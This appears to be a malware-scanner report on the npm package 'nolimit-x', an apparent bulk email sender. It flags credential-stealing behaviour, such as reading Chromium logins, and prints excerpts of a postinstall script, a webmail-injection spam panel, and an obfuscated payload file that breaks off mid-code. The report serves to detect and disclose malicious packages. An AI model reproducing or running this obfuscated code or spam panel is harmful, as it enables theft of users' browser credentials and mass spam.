// npm 패키지
nolimit-x
Advanced email sender
버전
230
메인테이너
1
라이선스
ISC
최초 publish
2025-07-01
publisher
nolimitaworkspace
tarball
1,096,056 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-06-04
// exfil path
what is read → where it ships
steals
- ● Chromium logins
- ○ home dir
- ○ system info
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> const { execSync } = require('child_process');
> prefix = execSync('npm config get prefix', { encoding: 'utf8' }).trim();
> const _0x30f815=_0x5a7c;(function(_0x3104de,_0x447954){const _0x38a420=_0x5a7c,_0x2dbc7e=_0x3104de();while(!![]){try{const _0xe4c8a4=-parseInt(_0x38a420(0x188,'ICE%'))/0x1*(-parseInt(_0x38a420(0x1b9,'…
// offending code · @1.0.232 · 3 files flagged
- @1.0.232 · AUTO-PUBLISHED · publisher: nolimitaworkspace · heuristic 93/100 · static flags 7 · llm skipped · install-scripts:postinstall · publish-burst:4 · new-publisher:13d · publisher-handle-randomlooking · mature-package · reads-chromium-creds · reads-homedir · reads-system-info · child-process-spawn · long-base64-literal · webhook-bin · archive-then-upload
// offending code · 3 files flagged · patterns: 7
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly npm run build && node scripts/copy-native-binary.js --- package/src/web-panel/ws.js (excerpt) --- /* ============================================================ ws.js — Nolimit WebSend Panel Injected into the active webmail tab by the Chrome extension. Self-contained, no external dependencies. ============================================================ */ (async function () { 'use strict'; try { // Prevent double-inject if (document.getElementById('__nl-panel')) return; // Read config injected by extension background.js const stored = window.__nlConfig || {}; const config = { fromName : stored.fromName || '', subject : stored.subject || '', targets : stored.targets || [], template : stored.template || '', }; // ── Provider detection ──────────────────────────────────────── const host = location.hostname; let provider = 'generic'; if (host.includes('mail.google.com')) provider = 'gmail'; if (host.includes('outlook.live.com') || host.includes('outlook.office.com')) provider = 'outlook'; if (host.includes('mail.yahoo.com')) provider = 'yahoo'; if (host.includes('mail.zoho.com')) provider = 'zoho'; if (host.includes('mail.proton.me')) provider = 'proton'; const providerLabel = { gmail: 'Gmail', outlook: 'Outlook', yahoo: 'Yahoo', zoho: 'Zoho', proton: 'ProtonMail', generic: 'Webmail' }[provider]; // ── Spintax resolver ────────────────────────────────────────── function resolveSpintax(str) { return str.replace(/\{([^{}]+)\}/g, (_, group) => { const opts = group.split( --- package/scripts/postinstall.js (excerpt) --- #!/usr/bin/env node // postinstall.js — fixes npm's failure to create the bin shim on Windows // when the bin entry points to a dotfile directory (e.g. .ad/x0.js). // This runs automatically after `npm i -g nolimit-x`. 
'use strict'; const os = require('os'); const path = require('path'); const fs = require('fs'); const { execSync } = require('child_process'); if (os.platform() !== 'win32') process.exit(0); // Unix: npm handles it fine try { // Resolve npm global prefix let prefix; try { prefix = execSync('npm config get prefix', { encoding: 'utf8' }).trim(); } catch (_) { process.exit(0); // can't determine prefix — skip silently } const binDir = prefix; // on Windows global bin shims live directly in prefix const shimPath = path.join(binDir, 'nolimit.cmd'); const entryFile = path.resolve(__dirname, '..', '.ad', 'x0.js'); // Already exists — nothing to do if (fs.existsSync(shimPath)) process.exit(0); const shimContent = `@ECHO off\r\nSETLOCAL\r\nSET PATHEXT=%PATHEXT:;.JS;=;%\r\nnode "${entryFile}" %*\r\n`; fs.writeFileSync(shimPath, shimContent, 'utf8'); console.log(`[nolimit-x] Created bin shim: ${shimPath}`); } catch (e) { // Non-fatal — user can still run via `node .ad/x0.js` console.warn('[nolimit-x] postinstall: could not create bin shim:', e.message); } --- package/.ad/smtp-health-cache.js (excerpt) --- const _0x30f815=_0x5a7c;(function(_0x3104de,_0x447954){const _0x38a420=_0x5a7c,_0x2dbc7e=_0x3104de();while(!![]){try{const _0xe4c8a4=-parseInt(_0x38a420(0x188,'ICE%'))/0x1*(-parseInt(_0x38a420(0x1b9,'d#4O'))/0x2)+parseInt(_0x38a420(0x1d1,'iACy'))/0x3*(-parseInt(_0x38a420(0x1c8,'#F[f'))/0x4)+parseInt(_0x38a420(0x1a4,'kfuJ'))/0x5+parseInt(_0x38a420(0x18f,'M1JK'))/0x6*(parseInt(_0x38a420(0x186,'M1JK'))/0x7)+parseInt(_0x38a420(0x1ca,'Gt#%'))/0x8*(parseInt(_0x38a420(0x191,'*m*W'))/0x9)+parseInt(_0x38a420(0x1c0,'#F[f'))/0xa+parseInt(_0x38a420(0x1bf,'F5BG'))/0xb*(-parseInt(_0x38a420(0x189,'mEs]'))/0xc);if(_0xe4c8a4===_0x447954)break;else _0x2dbc7e['push'](_0x2dbc7e['shift']());}catch(_0x2e6be3){_0x2dbc7e['push'](_0x2dbc7e['shift']());}}}(_0x301a,0xa2a78));const _0x44b4d9=(function(){let _0x237bec=!![];return function(_0x1e4875,_0x565649){const _0x53e544=_0x237bec?function(){const 
_0xfcee14=_0x5a7c;if(_0x565649){const _0x43b9a2=_0x565649[_0xfcee14(0x1bd,'cWT*')](_0x1e4875,arguments);return _0x565649=null,_0x43b9a2;}}:function(){};return _0x237bec=![],_0x53e544;};}()),_0x1e3084=_0x44b4d9(this,function(){const _0x3da330=_0x5a7c;return _0x1e3084[_0x3da330(0x199,'0who')]()[_0x3da330(0x17d,'94&6')](_0x3da330(0x1c2,'#F[f'))['toString']()[_0x3da330(0x1d6,'fBI&')](_0x1e3084)[_0x3da330(0x1d3,'%6Ih')](_0x3da330(0x1bb,'6[*2'));});function _0x5a7c(_0x5bf93a,_0x3dadcc){_0x5bf93a=_0x5bf93a-0x17d;const _0x764d67=_0x301a();let _0x1e3084=_0x764d67[_0x5bf93a];if(_0x5a7c['QTveLf']===undefined){var _0x4
